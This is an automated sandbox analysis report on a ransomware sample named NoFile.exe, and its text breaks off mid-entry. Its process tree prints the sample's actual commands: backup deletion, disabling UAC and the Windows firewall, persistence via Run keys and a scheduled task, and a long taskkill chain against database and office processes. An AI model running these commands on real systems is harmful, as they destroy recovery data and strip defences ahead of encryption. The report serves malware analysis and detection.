Analysis
- max time kernel: 150s
- max time network: 132s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 06/02/2022, 09:18
- Static task: static1
- Behavioral task: behavioral1 (Sample: NoFile.exe; Resource: win7-en-20211208)
- Behavioral task: behavioral2 (Sample: NoFile.exe; Resource: win10v2004-en-20220112)
General
- Target: NoFile.exe
- Size: 2.2MB
- MD5: 7d1ed67b77f47ba8aadf9a3ac7d0c371
- SHA1: a598e6708c189caeef1fa76064feb4d0155abb3d
- SHA256: 87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
- SHA512: 17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9
Malware Config
Signatures
Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies Windows Firewall (1 TTPs)

Drops startup file (2 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | NoFile.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe | NoFile.exe

Adds Run key to start application (2 TTPs, 4 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe" | reg.exe

Drops desktop.ini file(s) (2 IoCs)
description | ioc | Process
File opened for modification | \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini | NoFile.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\e: | NoFile.exe
File opened (read-only) | \??\h: | NoFile.exe
File opened (read-only) | \??\n: | NoFile.exe
File opened (read-only) | \??\q: | NoFile.exe
File opened (read-only) | \??\s: | NoFile.exe
File opened (read-only) | \??\J: | NoFile.exe
File opened (read-only) | \??\V: | NoFile.exe
File opened (read-only) | \??\X: | NoFile.exe
File opened (read-only) | \??\U: | NoFile.exe
File opened (read-only) | \??\v: | NoFile.exe
File opened (read-only) | \??\E: | NoFile.exe
File opened (read-only) | \??\Z: | NoFile.exe
File opened (read-only) | \??\y: | NoFile.exe
File opened (read-only) | \??\R: | NoFile.exe
File opened (read-only) | \??\T: | NoFile.exe
File opened (read-only) | \??\a: | NoFile.exe
File opened (read-only) | \??\p: | NoFile.exe
File opened (read-only) | \??\t: | NoFile.exe
File opened (read-only) | \??\F: | NoFile.exe
File opened (read-only) | \??\L: | NoFile.exe
File opened (read-only) | \??\O: | NoFile.exe
File opened (read-only) | \??\x: | NoFile.exe
File opened (read-only) | \??\i: | NoFile.exe
File opened (read-only) | \??\r: | NoFile.exe
File opened (read-only) | \??\H: | NoFile.exe
File opened (read-only) | \??\b: | NoFile.exe
File opened (read-only) | \??\f: | NoFile.exe
File opened (read-only) | \??\S: | NoFile.exe
File opened (read-only) | \??\Y: | NoFile.exe
File opened (read-only) | \??\g: | NoFile.exe
File opened (read-only) | \??\j: | NoFile.exe
File opened (read-only) | \??\l: | NoFile.exe
File opened (read-only) | \??\A: | NoFile.exe
File opened (read-only) | \??\K: | NoFile.exe
File opened (read-only) | \??\M: | NoFile.exe
File opened (read-only) | \??\W: | NoFile.exe
File opened (read-only) | \??\k: | NoFile.exe
File opened (read-only) | \??\m: | NoFile.exe
File opened (read-only) | \??\o: | NoFile.exe
File opened (read-only) | \??\B: | NoFile.exe
File opened (read-only) | \??\G: | NoFile.exe
File opened (read-only) | \??\Q: | NoFile.exe
File opened (read-only) | \??\u: | NoFile.exe
File opened (read-only) | \??\w: | NoFile.exe
File opened (read-only) | \??\z: | NoFile.exe
File opened (read-only) | \??\I: | NoFile.exe
File opened (read-only) | \??\N: | NoFile.exe
File opened (read-only) | \??\P: | NoFile.exe
Drops file in Program Files directory (64 IoCs)
description | ioc | Process
File opened for modification | \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf | NoFile.exe
File opened for modification | \??\c:\Program Files\Common Files\System\msadc\msdaremr.dll | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\Portal\PortalConnectCore.dll | NoFile.exe
File opened for modification | \??\c:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html | NoFile.exe
File created | \??\c:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui | NoFile.exe
File opened for modification | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png | NoFile.exe
File opened for modification | \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll | NoFile.exe
File opened for modification | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml | NoFile.exe
File opened for modification | \??\c:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml | NoFile.exe
File created | \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BOLDSTRI\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm | NoFile.exe
File opened for modification | \??\c:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui | NoFile.exe
File opened for modification | \??\c:\Program Files\VideoLAN\VLC\plugins\access\libvcd_plugin.dll | NoFile.exe
File opened for modification | \??\c:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jre7\lib\zi\SystemV\AST4 | NoFile.exe
File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\PHONE.XML | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\SPRING.ELM | NoFile.exe
File created | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml | NoFile.exe
File opened for modification | \??\c:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui | NoFile.exe
File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll | NoFile.exe
File created | \??\c:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\pkeyconfig.companion.dll | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML | NoFile.exe
File created | \??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\Read_Me!_.txt | NoFile.exe
File created | \??\c:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna | NoFile.exe
File opened for modification | \??\c:\Program Files\Windows Photo Viewer\ImagingDevices.exe | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT | NoFile.exe
File opened for modification | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif | NoFile.exe
File opened for modification | \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\ReachFramework.resources.dll | NoFile.exe
File opened for modification | \??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll | NoFile.exe
File opened for modification | \??\c:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB | NoFile.exe
File opened for modification | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jre7\lib\zi\Asia\Makassar | NoFile.exe
File opened for modification | \??\c:\Program Files\VideoLAN\VLC\plugins\d3d11\libdirect3d11_filters_plugin.dll | NoFile.exe
File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png | NoFile.exe
File opened for modification | \??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api | NoFile.exe
File opened for modification | \??\c:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar | NoFile.exe
File opened for modification | \??\c:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar | NoFile.exe
File created | \??\c:\Program Files\Common Files\Microsoft Shared\OFFICE14\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png | NoFile.exe
File created | \??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar | NoFile.exe
File created | \??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\Read_Me!_.txt | NoFile.exe
File opened for modification | \??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml | NoFile.exe
Drops file in Windows directory (2 IoCs)
description | ioc | Process
File created | C:\Windows\Pagesfilo.sys | NoFile.exe
File opened for modification | C:\Windows\Pagesfilo.sys | NoFile.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
560 | schtasks.exe

Delays execution with timeout.exe (10 IoCs)
pid | Process
968 | timeout.exe
672 | timeout.exe
552 | timeout.exe
1708 | timeout.exe
688 | timeout.exe
1588 | timeout.exe
1740 | timeout.exe
560 | timeout.exe
1780 | timeout.exe
1656 | timeout.exe

Enumerates processes with tasklist (1 TTPs, 11 IoCs)
pid | Process
1928 | tasklist.exe
1872 | tasklist.exe
796 | tasklist.exe
1820 | tasklist.exe
1696 | tasklist.exe
968 | tasklist.exe
1396 | tasklist.exe
972 | tasklist.exe
632 | tasklist.exe
1060 | tasklist.exe
364 | tasklist.exe

Gathers system information (1 TTPs, 2 IoCs)
Runs systeminfo.exe.
pid | Process
964 | systeminfo.exe
1160 | systeminfo.exe

Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
1260 | vssadmin.exe
772 | vssadmin.exe

Kills process with taskkill (40 IoCs)
pid | Process
1520 | taskkill.exe
1780 | taskkill.exe
1552 | taskkill.exe
1984 | taskkill.exe
1664 | taskkill.exe
1364 | taskkill.exe
2020 | taskkill.exe
292 | taskkill.exe
1548 | taskkill.exe
920 | taskkill.exe
932 | taskkill.exe
268 | taskkill.exe
1924 | taskkill.exe
688 | taskkill.exe
1260 | taskkill.exe
1272 | taskkill.exe
1044 | taskkill.exe
1776 | taskkill.exe
1732 | taskkill.exe
1272 | taskkill.exe
1060 | taskkill.exe
624 | taskkill.exe
864 | taskkill.exe
1612 | taskkill.exe
1524 | taskkill.exe
316 | taskkill.exe
820 | taskkill.exe
964 | taskkill.exe
1244 | taskkill.exe
1728 | taskkill.exe
460 | taskkill.exe
2028 | taskkill.exe
580 | taskkill.exe
1696 | taskkill.exe
1740 | taskkill.exe
364 | taskkill.exe
1300 | taskkill.exe
1708 | taskkill.exe
1396 | taskkill.exe
560 | taskkill.exe

Modifies registry key (1 TTPs, 3 IoCs)
pid | Process
856 | reg.exe
672 | reg.exe
1732 | reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | Process
796 | tasklist.exe (2 entries)
632 | tasklist.exe (2 entries)
796 | taskmgr.exe (60 entries)

Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
pid | Process
796 | taskmgr.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 796 | tasklist.exe
Token: SeDebugPrivilege | 632 | tasklist.exe
Token: SeBackupPrivilege | 2008 | vssvc.exe
Token: SeRestorePrivilege | 2008 | vssvc.exe
Token: SeAuditPrivilege | 2008 | vssvc.exe
Token: SeDebugPrivilege | 796 | taskmgr.exe
Token: SeDebugPrivilege | 1820 | tasklist.exe
Token: SeIncreaseQuotaPrivilege | 460 | WMIC.exe
Token: SeSecurityPrivilege | 460 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 460 | WMIC.exe
Token: SeLoadDriverPrivilege | 460 | WMIC.exe
Token: SeSystemProfilePrivilege | 460 | WMIC.exe
Token: SeSystemtimePrivilege | 460 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 460 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 460 | WMIC.exe
Token: SeCreatePagefilePrivilege | 460 | WMIC.exe
Token: SeBackupPrivilege | 460 | WMIC.exe
Token: SeRestorePrivilege | 460 | WMIC.exe
Token: SeShutdownPrivilege | 460 | WMIC.exe
Token: SeDebugPrivilege | 460 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 460 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 460 | WMIC.exe
Token: SeUndockPrivilege | 460 | WMIC.exe
Token: SeManageVolumePrivilege | 460 | WMIC.exe
Token: 33 | 460 | WMIC.exe
Token: 34 | 460 | WMIC.exe
Token: 35 | 460 | WMIC.exe
(the 20 WMIC.exe token entries above appear a second time, in the same order)
Token: SeDebugPrivilege | 1696 | taskkill.exe
Token: SeDebugPrivilege | 1708 | taskkill.exe
Token: SeDebugPrivilege | 1740 | taskkill.exe
Token: SeDebugPrivilege | 316 | taskkill.exe
Token: SeDebugPrivilege | 820 | taskkill.exe
Token: SeDebugPrivilege | 364 | taskkill.exe
Token: SeDebugPrivilege | 1396 | taskkill.exe
Token: SeDebugPrivilege | 1364 | taskkill.exe
Token: SeDebugPrivilege | 2020 | taskkill.exe
Token: SeDebugPrivilege | 1244 | taskkill.exe
Token: SeDebugPrivilege | 1552 | taskkill.exe
Token: SeDebugPrivilege | 920 | taskkill.exe
Token: SeDebugPrivilege | 1696 | tasklist.exe
Token: SeDebugPrivilege | 932 | taskkill.exe
Token: SeDebugPrivilege | 1272 | taskkill.exe
Token: SeDebugPrivilege | 560 | taskkill.exe
Token: SeDebugPrivilege | 1984 | taskkill.exe

Suspicious use of FindShellTrayWindow (64 IoCs)
pid | Process
796 | taskmgr.exe (64 entries)

Suspicious use of SendNotifyMessage (64 IoCs)
pid | Process
796 | taskmgr.exe (64 entries)

Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 1604 wrote to memory of 808 | 1604 | NoFile.exe | 28 (4 entries)
PID 808 wrote to memory of 796 | 808 | cmd.exe | 29 (4 entries)
PID 808 wrote to memory of 1032 | 808 | cmd.exe | 30 (4 entries)
PID 1604 wrote to memory of 1796 | 1604 | NoFile.exe | 32 (4 entries)
PID 1604 wrote to memory of 1820 | 1604 | NoFile.exe | 33 (4 entries)
PID 1820 wrote to memory of 580 | 1820 | cmd.exe | 34 (4 entries)
PID 1604 wrote to memory of 268 | 1604 | NoFile.exe | 35 (4 entries)
PID 268 wrote to memory of 560 | 268 | cmd.exe | 36 (4 entries)
PID 580 wrote to memory of 1624 | 580 | WScript.exe | 37 (4 entries)
PID 580 wrote to memory of 832 | 580 | WScript.exe | 39 (4 entries)
PID 832 wrote to memory of 632 | 832 | cmd.exe | 41 (4 entries)
PID 832 wrote to memory of 1176 | 832 | cmd.exe | 42 (4 entries)
PID 1604 wrote to memory of 1876 | 1604 | NoFile.exe | 43 (4 entries)
PID 1876 wrote to memory of 1512 | 1876 | cmd.exe | 44 (4 entries)
PID 832 wrote to memory of 1260 | 832 | cmd.exe | 45 (4 entries)
PID 832 wrote to memory of 672 | 832 | cmd.exe | 47 (4 entries)
Processes
-
C:\Users\Admin\AppData\Local\Temp\NoFile.exe"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵PID:1032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1820 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵PID:1176
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
PID:1260
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:672
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1728
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:552
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1860
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1740
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1060
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1048
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:560
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:364
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:2004
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1780
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:968
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:292
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1708
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1928
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1060
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:688
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1396
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:580
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1588
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:972
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:840
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:968
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq NoFile.exe" /fo csv5⤵
- Enumerates processes with tasklist
PID:1872
-
-
C:\Windows\SysWOW64\find.exefind /I "NoFile.exe"5⤵PID:1360
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
PID:1656
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
PID:560
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵PID:1512
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵PID:1924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵PID:1776
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:964
-
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵PID:2028
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵PID:1612
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
PID:1160
-
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes2⤵PID:556
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
PID:856
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:772
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:460
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵PID:2020
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵PID:624
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵PID:1524
-
-
-
Level 2: C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
  PID: 1572

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im notepad.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1696

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im msftesql.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1708

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im sqlagent.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 1740

Level 3: C:\Windows\SysWOW64\taskkill.exe
  Command line: taskkill /im sqlbrowser.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID: 316

Level 3: C:\Windows\SysWOW64\taskkill.exe
